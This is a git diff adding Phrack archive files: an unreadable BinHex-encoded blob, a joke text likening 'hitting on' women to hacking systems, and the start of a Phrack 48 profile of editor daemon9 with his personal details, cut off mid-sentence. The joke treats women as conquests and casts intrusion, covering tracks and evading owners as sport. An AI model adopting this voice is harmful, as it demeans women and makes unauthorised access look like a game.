+SmIdEIPeAjV&8AFB(hr1ZPc#rHMA`*[Y#RdQpi4R-Ap'IYMThR[1El'-Hr&j"LrB
+86jq,r5[mi1mVr'JV&)ZK3dXUha+p2[QMDh)aK+GhV*lU%ckYN!!`I"@0dT)VXS4
+ERIa2NR@YjYP44IKm&LJdmGlZq6phdDY!2$0a6U1bEdR0V0ZfMp$Tc16%`qi%A3D
+KTj@0XNHNKAkjkNkai$'E98S,Gm[hLD1MD[6ASjr2l`KVPFrIVYe(ph9dGqAqHhc
+IQ6T`TH0DN!$&K3&F*[ZC02Z1BKE%*FfCZ2DC[f8p,JVl@ZipPSJZB&Q9&m!JK8-
+VRHAH[BFI#MmrTeE,DbcAlZbTZ291A!Z1iE,GpdUbF3#BU+kU-eEYi4I"jl)(dUG
+`a8KYPHBPQ&SAp&#NIG99VBaQPJh1lRD'kES),M6Ndl86jpA8cpKX+*&[$MU[*Nq
+cJ2B6l5GcYV+(YCA43TEeJaBJY$K[d&9`D6FkJqR(d`I5rccpjqLpQ[i#CrdIF1(
+Up94IV0JjQATKlki5A#'(VVQT[K)FE%V2cdPSHH#V0JB)V552BriP,U(qK$V!2TA
+UXlYaADmBPm&i*hf5)mePEHRM9,8kZ!$&d[ralMhT9qE8dJ63MjINY8TmMY!``I%
+iVr5ri%VYKpl-q6%GIBZ,K"*GMXeThIU&Q`T6@RlMeQJ4bi*Z4EK!#0hDVMQfke4
+h-IZ,2DR[BG+2b4$0k8b$Lq6m,p`d,i9,`cRDXTk#9PBAjGIiF&8j[He@A&*PmJH
+AX#aY@I9Zr8lbN!!*,iN1A3",Yf[jh(hmfJ,8'#6I3Bemce1NE@&Y54'8,),fq@P
+i,[h[m2l*45hIF0&ad9HJ`lNjdEPFaI*ZpQ+L8G@f-TPddUV[K4,k+rSVZ+l,9D%
+HCi%%%0IjFHdHq(!#VXfQ2dV)23@NEL(dG*N1dCALFU39%LZh)3Zk-japJ[QF6C3
+4b8&RZ'Bh-B0lchkfa6Q2HKMeL28dric"-+i`2e+Bd2,A9VRSAm28%2F0,L%63[S
+X($+8EKIZ4TVPi5+hR2lhP$R12F)A1GQ-h9Z&DkCj`$f1#r*l8,p@8p8UpbeT[*d
+`k0S$TZP#kA'U8Yq&%ZG6IAV@[ZlAGLf8@N95B,)N(pKrbC&qdZS(rZb5['M@AQL
+(+bJ#"5`j"V+%qlE2i9Hpk1LH(p[,"R[T"Fdbk$*"AbVaBYq26,T)m)-AY4`$"rK
+)rDr4)Y!Gi2Z!KTrhT0`h(90)lae9L!N2m9)A6`%1N4Fk6Ymr[8I`([[(0hK1[8I
+SlI'('!Pk4jbaK-(Na-fV,&(Ab+*1A+kV48h[L226%FMTeeM*X-B+9BhGp[ZDla6
+9H&1IjM4rJA25M`XR`hLM,TMJM`IEP(H-6bG5U'@U"`DBccfdJfZqp5h8dhEcKf8
+pb"q@,GCIPQ2cKdhAqF1ZqFmlj$@6TiedUi#G%AMdP2bQ,`M[hZhf#aAhNDr@dGF
+[qJ!1m26Q04!QqL6j9(qASJ6qTZmiPrUS[EjKAF+,a%3I@`1EiZ2bprajKQ#T$j2
+[h[f*r@GL)%Rp"MbBQ-!MpcFdE[r%r[e2N!#H&rdY(1lliG8+8[[+NidXZ`DR+&G
+,1"1rc2eU$(G5a(R-4'UlU5bl+HcE[jqRYhmr(Y66U0krRf8e02"q0YASjlKT2pe
+0qe`hlI2FY-ph8hl'2k6k93!H#3%jC@fejJ2eeN4A85$U5M[X*QR`ZSff[AM*)Jc
+&1jCdfTCk2ieGCbrKiah@GGH6Z[YXNkYZ@1VeT0kqHR-IbPXMX@Z[,pbpZa[cqf#
+DkFB+9I56EKri["mAr8KXeL@m0VHrj(l4Mi@Zli0+qaBYrcc+kEH!$qII+IMI![l
+rL[S2h[m(SKqk[RHrii$2ja#DScGMRZ-p-+(A4dqFq+PcVV%4"rf1!chE5,pE1KZ
+j#cXXYG&HNPbpTV'KCSRGBG[@G3mqZ0*Hp0ZGMAC(`dVd*hFSelGA)AKb2Xl2k@l
+%Zj,kANl"`kk0DDA&Na#hSIifmA-i[X+X!$RE8+f!T0LQ"41JDbTa@`dV'&A$c!r
+r"a8c8+VDCXL1++CL"XfbH-`-+UA"'X8U8a1+U8C+`dSiSZK+5&'NH%K466XF$+X
+4-f$DDSJTIP8T"4d$ND)'H++%3S'!EB5Pd+a`)""35Je,!8Y9X@+4J")X9Aaf4&+
+@5iUN5P)3@ULUSKY"b94#)!+@08UB+B#1k*4LFSaQG1#VbNT&3K93N!"R%UMiiU8
+kBNleQj!!ae*Y)US%`dSd%$#93"$L!LmJ"94E#8TK99(#DLJ3$"R*T+%%3bEkJ8"
+F!l%DDhN5%iTFTTLQ,flUX!8J!dT))aFTBG-S09GLaZ,V!%d%)9%LU!C-96AMLT)
+`3f&&Kc@3!+e)9`81X0&Ar,SD9p95+fbBm!Bdm'&Y0293Z03(H3a3+N@GM%"99B*
+&bZ#pN!#ZP*@Uj!89#LU5U8,A)%5)5J(6$#Pf+)c(,Je*9J,18[5JDUV35j%N+45
+dbjB(JRB)RLJeH-,$4$"3Z"4@$+0T,P)L5U68Y"8,4Sr"6CB5$2K9%eb83#3-3NU
+TCBGJ&b9%8U[+,-Xd`U@K*+`9P",a3#NS+k8Q*X-"-!VCF"X%S&KKLJ4-#l1)'UJ
+Q+D8"-kB`+3QbNXq#bp9`h%3@3EP5#B6#bXdDHQVB9')5'Gj80F@dV6*P9K$4B+)
+"5D3B!)Ah`NJRf-8dlB!8$"S"#+F#%NNL+6AJ,)'k(T*#(0T5T9$!#UX)28KL+9B
+bS*Kq+%F`a-%LIj5#6eJbQ336Ni%P0Bld3B*"*eK#a8B89fa%8!Jr9BA1#"$%Jk3
+Q5@0l1EN)ZX#!!!r$ENSiVUL"L"%[JqGK$6H)%8Vq)#NPUc8f021[L#YQ'I3A34c
+#GFd`@EPDY@0*NaQ3!*0F1a(%*LLS5SfK*'(D@@@aZ'AC%"#j*S)Bp&@BLVJVUQ@
+'c4!*JZ`33Cb%aq'M**)HrJF%P#&aN!!F2)L43F&S++MB&K`"VP*Te)4UX*m)BPJ
+32*!!8XKE-f3'N!$EDY+@CLPZ%*2e*"11Kdf$XP*'CN+kFlY4%)-YV+Y)-&%5[*!
+!!#5!6`ql33`AKT8D&Ei#ja#NK9HJ&eL))%CQdaT!+3AFm!H3!([Fq+Dk3S%$3NJ
+d#j%%Am'#55aZ%8Sq43dL)V(eK0A5F%#'@`+'S[KM5&4!"5LfH')(%9%f6%f#mb%
+%H,Jd'E`CKLUe&6880%-@'L3Up)62`!fl%(F[l6Kaa3UTDS)BN6PXb)L)8J2"P8T
+5LGd-J$)*X8lNJY`FJ3M(aP*$U`Ul@9d1)@L#PK-6HaQ-EbPf')ST5X3U0A8+9F`
++F`"9$G&HJ4d#HTJ4'pTL3k!pLXb"d$!45dUC'Jk&&-PBC',l-#e6Y3-4'`+TjLb
+EGJ2`J)U5A`AK1)5dVE#PK-RqYNPkQH(P)@9@`N61@qDXB%$&,&GBKa8X"$TD#U8
+H8S3XKEd![L#&I8JK*43h*GK-X,6ML#6NP-hY$`("!"4J%*2VDJ0"5CEL63UESG*
+5*@c8b)Z849Jb6"YlT4@bJRB3lSA#38KLJ!b3!'0)$0U5b$i4+j3)NIe*$MJA)cE
+F5C6K+L88,,86Y&!"VBB8T-H%!L&9YU%%9,()JEST*@4b)RQ%Ee%8JE38U9#5far
+,@8#*)ecmN9Q8Z)MR)0Ba#-6Y$`[@m*49E&5'BGp-L`Mf-pKBE$X)FT8@+`42NPC
+EV'`JLDLh9jTa1%i0"d,KU)MTQR!iC+T*``S##Lj@bLaP%E6!aMFV@4S*Blq46&P
+4lD$URK"-Bic1SA!bKA0SIN+&FqMpqaXDk%5,prQ*&[SidD+65*`I2(5eJC-)24&
+@%MJcN3dpT0Zf(Nr%$0h3rC'bT&qA)lVI-R`a1fMSL6*0el5B*ZXa24baBVTY*(6
+!ahA9X+c5B0Lb)Z#4X!cEXJ,m(#B@#`B6LE!H5qM"B$#Lf6+B"8')aB)keSTiSM4
+XK28`FPbApD"Z@4Uc*%2Ab`KF0b`Y(06dB#!US4rf%A00$PUkCF6#ZQlTY2$L-%#
+AbT+3!%8,QMEQ$GP1J#K1JI3)@1Yk8!Bji'%VaP'4T!%BleK3MYVaD&+AicVk`9!
+#a'cEEm4d14Efa3`MA'CVXKpU5+!B*5DkCQK*`b#$q'RCj3G28P!cJV+PkTBGXE"
+`k9&GmaZ*-1%CPK(%GUVjpA"#6PT@dX#A'$6LDi9a,UeUFLb#KSaV)$V-)a[4'&3
+e)E!["Zp&j8K86j)A,!JD0R659GB-(2HSKKicV#JXD56e8X-IK,-d@ECe'`JiIY"
+MrQ4F$rU6TEB1ij($B3%b8!4He0!dB+qB"TdYJi`1raN`#Sj3$&)Z%!8K2@,i,5L
+Lkh%Ui!qrPSMSm4L$l%E)#N&T13)F#`B#[6M)"r''Al"hi56HJ(h!(q!5p&8MFPJ
+aiU42R&bHL0K3&jN3#F-6$&mT)K86X)*%@U'&f,&p-4hU3aBd$#52$%$Z23f8C!Y
+1`,Q5,M0,KA!@+-K`ZT'd)$(&3DNH)fK$0[@BbJ!!CVBK'rjB%,X+0#8BF,"PF)k
+J(d!N+6!a'6L-5!T%'GaNk6)XBGY`-I,GJT%JL`8)*!TTEm21NN(k'mJG-U!186'
+N3Ae`5#DMF$@PNQA,#S95f)+5%-l'VU0,YXmb)P&b(JpL,"JD@GNIXT2qH$J!1A@
+i9[H#'+P*3CU``R'B0PRQXreq+dbj)S+Br'2#)*B'MH"D3bmP0@AiP!Ga(%cK)d3
+Ih!1lJLU*!fH+)%B'qB)a'Dk!DNMS5%3P9r%-S5"'XL%3iDX`j%,1),GYR-YC%6H
+)35KX`2(N#%Q1a-K-&M3NZe%3J`UX#er"1(#$35&LK+2-#f)p!)dY+%UHLI[K2Kl
+LB#'#'-+4Gf&*i-*L0V)#!#SPC'N3L,UIJ59mKG#)iiC!$-N(6#E,#)#!RY4d"@D
+`!K!KL83PlA%+3EV#)FK$k!X[d"c2IEm@-@)XS8H`h@&hm1YaRf&a8@%1(ZJD!Sb
+lPr,--Z5BC8-T5)&%J$()k9E3(c0L%3DRBahN'a*%iqB)d#d95L"%(8jES#Hrab+
+6d2#4$6,)V!38#qSDZ'Xbl4V%J*Z$!M)1'8"+J['d1!,CaSD!2BUE!c'+@0)M@-4
+LXE"QfeJk$-5qE3@4f@4rj#NN!!m'rMLeXT+dV0N-N8(f0fc5bi"4i&Kb0F!Y1BM
+GMV`Be#3i@UESKMbd(e++36j,dc5ZX!*B@5qc-BKd)CC)k&)%T3jcN!$#%"#F+'f
+`NA"G,5!BC4JJKIek@36ETfeL(8@N3)&%`T!!il,ImXPFB6qbhZ5QLIKTcB'jD9@
++qq*3'2DRI+(%3+4&i&QS6eNImaPfN!$X6fP$#T,)Y0r&L#KB3#YD$reK!dI&X"&
+jK1KKA4*,83*V#pNIbjN9M'#l##H`+pJ!#b,ISBXPNrfa-B)JV8B'a0)5GS)[)N%
+rI1GZ1`Kb'iX9JXHJ*4$,08K'))`GMpJ3(6Yd0%,"LDd!34$AlDJYqmY!$3FTF35
+@E[PJ4EY-LaU'M#8'I#`SB,&i4,-XfX5B*5FK'16JUlSQilamm[D4Hq)JZAGTC2F
+ZMFqp3q0hlp!`G[2N9d*`'HH#T%ihefrVl0#+LqP68%c#*jM&mhjT!JP!MTqq9HZ
+R6pfaj@,U'LEP8emc1c6hihF6)j-IfEDCC&SlY)TYlCZde,DfG5h&-pDd0AAJ8p2
+DJddGQl5D68dY@l5NpS(LD2'-hUVQVI9JJqpMYE@f0EAAYmr95Mri`6,`H*Y0ZmN
+PUM@eDbhE1V6@Y[TfI%TVk`jY@fYp5h%CrqUZaMmVVI'EfX@H00U'ECeE0h,3pI8
+Db$8hYH!$R4Z,2q4pr9QV&i!VYcAADq$&KpUeG@fBK%ceE9Tc8hYl8dZMKJ[J'lD
+eYA@fGK3AH[3fV@X(-8MDhVN"X1d0R4$P)Xhj(Y#$!#)9IS-c9p[B#AQfDHYDA$h
+`3C-Ej"ZihHEMTmK12RIMK)IRZfpkEX,a%&eV&eL2Gq2+PG[le9'5$#aaqAh'dPG
+i,6hc*lM'K5mK2FSIaVj66Eq*DeY6MmH*erlK`kbALUHSf%Y&)SXGIRX9IArTUN'
+PRr81ShL+LVe8*2"aIhJbC)I%%P$#[[jH1RbG6iURKcf-pf-A8i)`(qrqKYX6pD@
+8b!'@q-bqrR@k,XCRN!!5r%[mJLP9@$"i63X'eA685A8CJY[6Je!%(Pp3H#h`"JB
+%hX#!`+0TU[IMfTQS"CjBB+J@H2[h#cbqeU"ZD""i$3d#MeBH83ZmKJD"4efUbmS
+%APQC`#XV%hKPC3+[$)qS[D0Dlbh`D1N5YF"M61!*Qj!!fJ*,+%Sei9&0H&36RR#
+&1%S@H-)IlY%bV`@Hm)HBTPViJfU"*rcK(N(c@Z!*Ia!,J5Im3EA!%rkJ@Z!*Ia"
+EJ5Im3EA!%rkJ@Z!*IhLH%&ML,I#%2kJ@H-)IT*l`N!$`"p@%4cAK88ei3Q@UK6r
+F"CIA!NmS4VA!%`c*$3*26,J,-Um&R[#(ZaDM&[kJ@Z!*IhK(pe3,21%23KGi`Kp
+8#ccK$kS&R[#(Pa@H*`5@H!Xmi3qK"Xd)Ie!Y2#6m36AK88ei3M@UK6qS&RM#(e3
+,21%2S5l9`KrZ!3'["Cj3Q'U"*a3K&`Jm`B"UJ5Im3CA!%rkJVX!6rU"Di!Pr8#h
+`K$qm$2@b`[1%`"*[J5Im3Ha%jJTr8#dm*2a"0H%*&DJ@rU"Di!Pr8#h`K$q%@P3
+,Ie!Ym)3rU"Ci`Kp#9DU&2kJ@H-)I9!XmSE43RfUK$08#6c#K@Z!*IiKUFVI`-Y6
+,#Xm6!NZm*dpY[-h,fkLm6FREJ+BZS8aY)Yk'i@d1hNEJ*EfAi&ibHiRV*DQAN!"
+HmRQ*jL@9Pd"HXRL*i5@"jh$2ZCiM2DGj$[+Fi5RZ+HNTj$(h'$(QIA$-qliE[cU
+1jr"K8H0L1Rp`NC`rq&`%Ilc$0Zq#-Ql1ZFr9,KKj(eN6AjmM,[33&hU)#ch%K4l
+L3JpaSBHiL%[CiMEl1kG!G(i`8@I['[fhScJaR-j'Ga8G+rVr1h2Ck)8LGZ$YrXa
+"kF#"m5jflUfLD50G"`pfMCc'h"P[lUX%&XBAciUNNB1$r6,QKiYBehJrkrSjMCc
+Zj`JPE24Fd9Mr@*(rh,Q4VJ2Rqk@$)fH,f%(J($b&`I0&dmk0M(4e(F`)[%+"GjB
+SA##`NBYJEaIj4Jlf#k"E"0!`!Bd4d+M,RS#'Lq34&mF9i*F61'!Xj#3JM2Ah2eq
+8kFIRaITp4886!TbC`$[Z`AbV++qrU+LIr`#N#k#h""!l5$Kra#%1ASBBFL&'6Na
+!G(N3e`Q)[bjL)d!i3!KI)0Q@LVP"U$r@2`)#d$FEZ[Ah3lN46,j40"eqS[k",MK
+UB[B-T#FhN5'K$F-rD[#B%-14-G53!,[V!SNbdLmG',Q!k6I42A"@f-1E1qGf$Sj
+!IXBf#akr`*YeC4!&9)m44UBrjf$AZA-N!'L4qpL"dD)mXLT%)0r$`D$a,KM2MNa
+r&JD+-%'b`-m-(kpfUE)$!$j30)V"FB%&'Z0)!6"cQ5*"r-48#%F"m#i51CkdJ0*
+mNSfm65cA6E#Nh$J)5FQN"mC&(f!b3)NPd%E3i0L))jib9e"FBU-H933BrRI,"--
+4`9!S4"44RqFK4362L9a$lK+*Jq")H-6a)SbB23IHU!p`IY@6r-EkA881MT0"b3d
+(!6U)0lF#1*d6e#HQ+3P)3P$#+#HdH),3Z5P#)S(2F$B5jIbNL1cJ,eePhUBT#Jh
+'lK)d6Y-%`DpfkblLrNZHqPNLp5Faq1cEVL6B%%JYa-+N+"0)3QY8N!"ef,2Re,4
+B-D!Gk(!&1BdU3B1G3a+k9L!`Z%!X'QIG2"NXNXj"M)Nj1!FT4%jh0aAb+rJXZXM
+(XbYF`d11VcQ8dK5&Er&%2RpamMbirC9JBIq'"3m8MS82*#,VH6T2$PdSHJYl'$Z
+3!"%159dN3B+I%b6B1Bii+K$(qNq*P2)IS2`P%hV$&!TrHA&AB#-JFS"-6E$X(-p
+T6KaINHcr+e+$KmU9kBc(`e-92%K6JF2hL3XJ4541Hd&*qPkFT43H[b`',8I#J36
+PVSBBi8RPdL#c8@l`@Gp)84&jpKb-FiN(6kVc[%[E+Ud`2"(2rE@Ei$$8j,#[#jX
+D#FKj,2Gi$2%9L[YiV0m2V[d(N!#K2!`p-X+'&15A%(`(LiVi,X!ChHNbkJ)MGhe
+`i4!1)ZFmh35G#rhqeC26`LYXj'G6kR5p*4BmE"&MrG1!GV!IS6bj''$"kJFb)4'
+IDC!!H!)"K#!1K%95-(DIaqM-P-N)X!ZpLEJL"*F8bF&$JYBC#23ZPJZ!EC1a64k
+pAhVd4$Y6*'1E`cE2Y4AmhZBl%!M#P,RZYYMIA`5%,,$$k%8m[Q1"*-*I41`f3C4
+([,FC#J-4@CpB$-@L3-R%TrNq4RCi@eKfM"1GJZ,4#VIb$6FMGP#aD,5`89,m2#Q
+&fD,*"IKXdAQ3!*V1pf+Z)CqL2H35@)B@R)2R4+45`pZ3!$NHcqdc3LF4EaI2B'L
+$)T)B`$Tr32MK02K-*MM(m[Cl$X,Ai3qrHr"$b`[dKr`mZA$1J+AS`*[B3l,SY!&
+X4iZ#hVP$dH4Ta*QTS`NFT2cMN911k$M-[i[4ajYlf"kmIjGZXdL$q(f(h50GB2[
+`N3Ta38Bq*LFHCcQB@iZjalejVkE,13X[1+`[LfRiCQGI0Y2'm2pEh0VReYQS`f1
+VT$@mIeKkjLT)r5`@%Dkm4C3PSR5YbXY*ahm96Rlc2FFI`Gb3!$I[eH6iM`'rfbf
+cfFI'(#RMeQ0Z2B,k)5M4JrUM8+Ek+NMp,,B6!BabZbKE49NR5Qj912jU#$FT2l+
+6ep*ArrArZ8N*F#UbU,L"LXhi#`Zi!(Mi+N)P[U%bM#+,LKZSf)clUV32I&[k0RI
+LGHb0pp,K$EcGr`Kf-4eQBqlalTXQHYjcPrX',IlMkI"4ppE'l"AdZF3F0`fQrXA
+B"!GHcaM(VBT"E#XC*XR*A(3,d"dDii-,d4V"S1mDkRi-h6(UrM4[R2h#B4RUrGl
+&h['m$$LIaYpjNH32jSMH'*XFmTAQLKl)2*'2PZqdikF3qicEC0fSRjUD(+*Q0LD
+K$qZGDYC-0CpfQhjmG9$k%M@[`H4*e(rX0[dR%D+lU&Q!b5(8clY02cj9+6p,cB@
+BK0cX"FMd9iiI(IRe22UHpXmG(m6i,MNBImZ#ra-*(rl*f[[aRU[phAAb!GH9lm2
+R)b[BYr[`CbliX`Vr4-h2[V2lMl3C'Ye0EmFYmff0q+XmG1PmF9Ypr4TF#5qHJ@&
+kUVI@dkhZ4I2Z`RmUdA"cI&h(lHkS4J3Q(V0UfHeFM1Ce,61@NKiYp4fhEh-R%ZZ
+fE5hHX+hCTHAGMemrG@fH4Yr6djAcmRpq#qdiA[J54Qk8-qakqQmQk2f3!2ka#HT
+AkGqAS2jjXXTHK#hPl-UPpq!2BNKc0QlS`*m9Nf,fXUSP1-HiBfQb#KmCNPD,2ii
+KV4Gr*%0UX5TYi%YG64[Dm6FbT)qMMU2HKaSlM(4!r,d-kA$6KUddpdh802HLZ@a
+&$AJGYCI@,-1rkRK$r)-91AG$d`Em'brjfYE@G4fSLqpD9,N+p@,k,cc-*ppA[64
+C`kE*Mce3hpB1["r6(P9)AJdp1*Gk50$Ed-1Re[RFI26L6(BFN!!Z4`mI'+AHc!E
+d%[5CdKZC-KFprUp*#PRS2[6QLkaACI45E"I["9M`)h1a1&,2aTcUc[d1HM9ZE`G
+kG5l'1(VhLK#CPB2H@M%hD`Ck'phH224DhGlpk(@i[EI4fb4keikLpkcSA8HF6SV
+H$4*khd$!AD1aQkDKGachZ@HKGaek!jJV31p@&YTqA'KcMi(Hkm#i'A00k"f6S6G
+kHi$A3j`dT[prk$e2H"UEX`#pl`ZZYbRSI9l`L2d"H[MI8h52I-(ldH[$B3QmXf!
+aHLp*daQbB%%MHMZPA(BhHPhSECAb'2kZdi,2S,GAF&V`CqJG`EqpJiI,Mk,hCA$
+k#'0hR#E(q%i4aSSiG$VLHj0k0A1!mC3%lc+fHMCkTi4qDhm,[66j@'0hMk!AQ&R
+eB!Zqcq"pY'%Drr6$p15kPMrVd&CdYPcTjkrXf+M4AbE6jQRU04HEp)',GcjS-F2
+lP!A[jZ'[MA8dEG"UkVGhC&FhEHMSE+[hk[m(4#S!!!:
+
+
+
+------------------------------------------------------------------------------
+
+
+Hackin' GIRLS 'n SYSTEMS - .... 
+
+by SevenUp - sec@sec.de - http://www.sec.de/sec/
+
+
+Hitting on girls and hitting on systems (I'll call them both "targets")
+has quite some similarities. If you are good in hacking one of them,
+it won't be too hard to enter the other one....
+It also represents IRC channel #hack's current state of mind: 
+Women's talk is taking over. 
+
+
+
+THE GOALS
+=========
+
+- Biggest Challenge: 
+  To get inside the first time
+
+- Targets that have already been successfully hit by others lose a lot of
+  their attraction
+
+- The goal is to keep as many successfully (formerly virgin) targets as
+  possible
+
+- Different game: Hit one target from every region
+
+- Mark every target you hit
+
+- You don't really care much after you got your target, unless (in rare
+  cases) you love it
+
+
+
+TIPS FOR BECOMING SUCCESSFUL
+============================
+
+- Key to Success:
+  The right "defaults", depending on situation and targets
+
+- Be Cool:
+  Don't care too much about the target. Don't get involved
+  emotionally, but play a little with the target.
+
+- Knowing different languages and keywords may be useful with targets
+  of different origins
+
+- Social Engineering and spending time (sometimes money) might lead to your
+  goal easier
+
+- The more targets you'll hit on, the more you'll succeed. Just ignore any
+  failings. Remember: Better to have tried (and maybe lost) than not even
+  have tried.
+
+- Best time to find targets is at night
+
+- Backdoors are always inviting (sometimes dangerous)
+
+- Don't start with the top target. Start slow and easy and look for more
+  difficult ones after some success
+
+- If you get rejected on the first time, don't give up. There is always
+  a second chance
+
+- When you just got little time to hit on the target, don't hesitate -
+  a quick first try is never wrong and leaves you more time to think about
+  your second step.
+
+- Scanning (and probing) is neccessary. Don't give up, even your rate of
+  success lays somewhere between 1% and 50%
+
+
+
+SELECT THE RIGHT ONE
+====================
+
+- Be selective about your targets!
+
+- Try targets with tight openings
+
+- Targets with many users have more experience
+
+- Targets with shadows / shades are harder to enter
+
+- From the inside it's easier to reach the root-climax than from the outside
+
+- Many targets look uninviting from the outside, but welcome you deeply
+  inside
+
+- Some targets are leaking even before touching them
+
+- If a target blows, it sucks
+
+
+
+TECHNIQUES FOR MORE FUN
+=======================
+
+- After entering it, let the target become active too! Let it do some work
+  and see what comes up.
+
+- To protect your target, close all openings and save the key
+
+- Even some targets that suck can be nice
+
+- Sniffing Targets:
+  For lamers and perverts
+
+- Fingering Targets:
+  Can be interesting...
+
+- Leeching targets dry makes fun, takes time and let's them become
+  kinda useless
+
+- The right wrapper controls the intrusion and its consequences
+
+
+
+WARNINGS
+========
+
+- Remember: The number of tries is limited. After unsuccessful hits, the 
+  target and its environment will become aware - start searching in a new
+  area
+
+- NEVER just pay to get into a target
+
+- Don't fall for booby traps!
+
+- When calling up targets, make sure their owner doesn't notice
+
+- Don't use crack on the target... it fucks up the brain
+
+- Don't fuck (up) the targets without protection
+
+- Be aware: Some targets with change-root-environments can fake the
+  root-orgasm, or make you feel coming inside when you are not inside
+
+- Penetrating a target too hard could use up or damage your tools
+
+- Try to identify faked and "cross dressed" targets before totally unwrapping
+  them and finding a bad surprise
+
+- When entering a virgin target the first time, you have to wipe the tracks -
+  this can often be messy
+
+- Remember to get out of the target when you fall asleep
+
+- Never lose your mind over the beauty of a target. Always check for guards.
+
+- If you don't watch out, you may get a lifelong sentence after a 9 month trial.
+
+
+
diff --git a/phrack48/5.txt b/phrack48/5.txt
new file mode 100644
index 0000000..7d157d9
--- /dev/null
+++ b/phrack48/5.txt
@@ -0,0 +1,487 @@
+                              ==Phrack Magazine==
+
+                  Volume Seven, Issue Forty-Eight, File 5 of 18
+
+                            -:[ Phrack Prophile ]:-
+
+This issue, we have a "very special episode" of the Phrack Prophile.  As
+everyone knows, Phrack is once again in flux, and an entirely new editorial
+staff is coming on board.  In an effort to introduce everyone to these three
+hackers, we've had them do profiles.  Ladies and Gentlemen (yeah, like any
+ladies OR gentlemen read Phrack), meet your new editors:  Daemon9, ReDragon
+and Voyager.
+
+-----------------------------------------------------------------------------
+
+                              Prophile on Daemon9
+
+
+Personal
+~~~~~~~~
+        Nomenclature:  daemon9/route/infinity
+        In real life:  Mike D.  (as in David, not Diamond) S.
+                 DOB:  10.05.73
+               Likes:  Women who aren't afraid to cry.
+            Dislikes:  Hippies.  GOD, I hate hippies...
+                 Ink:  Large back piece, and growing... (It's the outline of
+                       a die.  (No, not as in a pair of dice, but as in a
+                       computer chip...)
+               Other:  Glock 19 with trigger-guard mounted laser-site.
+            Passions:  Computers.  Computer Security (or lack there of).
+                       Health.  Mental and Physical aptitude.
+           Main URLs:  http://www.infonexus.com/~daemon9
+                       ftp://ftp.infonexus.com/pub
+                       mailto://route@infonexus.com
+                       mailto://daemon9@netcom.com
+Hardware
+~~~~~~~~
+Years with Computers:  14ish
+     Computers Owned:  Towers: P90/32MB/3GIG (Windows NT/Solaris/DOS-WFW)
+                Mids:  P120/32/2GIG (Linux), 486-66/16/700MB (FreeBSD),
+                       486-50/16/540 (Linux)
+             Laptops:  P133/16/800, (Windows NT/Linux)
+                       486-75/16/500 (DOS/WFW)
+      Networks Owned:  The Information Nexus (infonexus.com)
+
+Media
+~~~~~
+               Music:  Front242, FLA, The Goats, NIN, Diatribe, 16Volt,
+                       Morphine, etc...
+              Movies:  Usual Suspects, Miller's Crossing, Sneakers, Fletch
+                       Army of Darkness, True Romance, NBK, etc...
+               Books:  TCP/IP Illustrated vols. I-III, UNP, Applied
+                       Cryptogrpahy 2nd edition, Computers and Intractablity:
+                       A Guide to the Theory of NP-Completeness, and so on...
+
+A Bit of History
+~~~~~~~~~~~~~~~~
+
+	Ah, the days of my youth...  Carefree, happy-go-lucky, life was a big
+open door to me.  One spring a very good friend of mine told me I should get
+an ``Internet'' account to write him mail while he was away at school.  
+	"Huh...?"
+...Was my concise reply.  I was deep into the computer thing at that time, 
+but I had not gotten into the Internet yet.  Well, we went out and bought
+a (at the time) $200 2400 BPS modem and got me hooked up with this brand new 
+service provider, NetCom Online...  At first I merely used the thing for 
+email, but soon after I taught myself all about Unix, I discovered all the 
+wonders of Usenet and IRC (AKA the Big Waste).  Most people know me from my
+frequent alt.2600 presense.  That's where I met Voyager.  We quickly found
+that we had the same interests as far as computers and hacking went.  The 
+rest is history...  Sorta.
+
+
+The Theory Behind It All
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+	When I look back and try to figure out how the hell I got here, I have
+one person to thank.  My father.  He bought me my first Commodore 64.  I can
+remember hooking that archaic thing up to my TV,  writing my own adventure 
+games in basic, and saving them to a tape drive.  My computer time line goes
+something like this:
+
+c64  Apple IIc IBM XT  IBM 286 486/33 486/66  P90 486/66 486/50 P120 P133...   
+1982   1984     1986     1987   1991   1992  1994  1995   1996  1996 1996
+
+	I am not happy unless I am bathed in a contstant stream of extraneous 
+RF radiation.  My room is alive with a myriad of blinking and flashing lights,
+several humming fans, and hundreds of feet of fire-hazard-inducing cables.  
+I have to put tin-foil on all of my windows just to keep the sun out and the 
+temperature down.  You'd be amazed how well that works.
+
+	The pursuit of knowledge is what led me down the path I am following.
+I am simply not satisfied with knowing that something works.  I need to 
+know why and how, and how to break it and then how fix it...  I do not solve a
+problem by merely finding a work-around.  I slam head on into the fucking 
+thing and work with it until a solution presents itself.  
+	
+	Intelligence, to me, is not what you know, or how much you know. It is 
+the ability to reason logically and rationally when the need arises and, if 
+pragmaticism is not the best approach, let intuition and chaos guide you.  
+Intelligence is adaptive and ever-changing...  Memory capacity is too often 
+mistaken for smarts...
+
+
+People I Know
+~~~~~~~~~~~~~
+
+     Linenoiz:	The reason I fell into the whole Internet scene to begin with.
+		Best friends for 12 years, I would not be where I am now 
+		without him.  He is one of the most intelligent people I know.
+
+	Nihil:	The reason I fell into the whole hacking scene to begin with.	
+		We have had our differences over the years, but our computing
+		interests are too similar to let petty squabbles come in the
+		way of our friendship.  The other one of the most intelligent 
+		people I know.
+   
+   Mythrandir:	I met Myth about 2 years on alt.2600.  Sharp kid.  Very sharp.
+		We think so alike on some things it's freaky.  We'll get going
+		on that Tiger Team soon enuff, Jeff...!
+	
+     Alhambra:	Strong coder.  We did the DemonKit for Linux (and are still
+		working on it..;)).  Jeremy and I also have very similar 
+		interests as far as hacking goes.  I am glad he is here
+		with me in the Guild.  I need more people like him.  Not a
+		risky gambler, but hey, I took care of that for both of us...
+
+     Halflife:	Coder supreme.  
+
+
+Shouts Out To
+~~~~~~~~~~~~~
+
+	Brent, Carrie, ColdFire, Crow, Halflife, Heather, Jason, Jen, Kev,
+	Ka_mee, MikeP, Mudge, Shawn, SirSyko, Tim, Tom, Topher, Xanax, Vision
+
+
+What I Have Done
+~~~~~~~~~~~~~~~~
+
+	alt.2600
+	--------
+	It used to be that you could find me in that group like clockwork.  I
+was always there.  Reading, posting, flaming, lurking.  That was me.  For 
+years.  This is where most people probably first remember me from.  I took
+it upon myself to self-moderate and answer all the questions I could possibly
+handle...  I usually posted several times daily.  At last count, I posted over
+2100 times (according to  ~/.tin/posted).  I was prolific.  I have fond memories
+of back then...  But, times have changed.  That group has gone almost completely
+to hell (AKA the way of #hack).  Thesedays, it's a fucking miracle if I find a 
+worthwhile thread to follow-up to... These days, look for me on comp.security.*, 
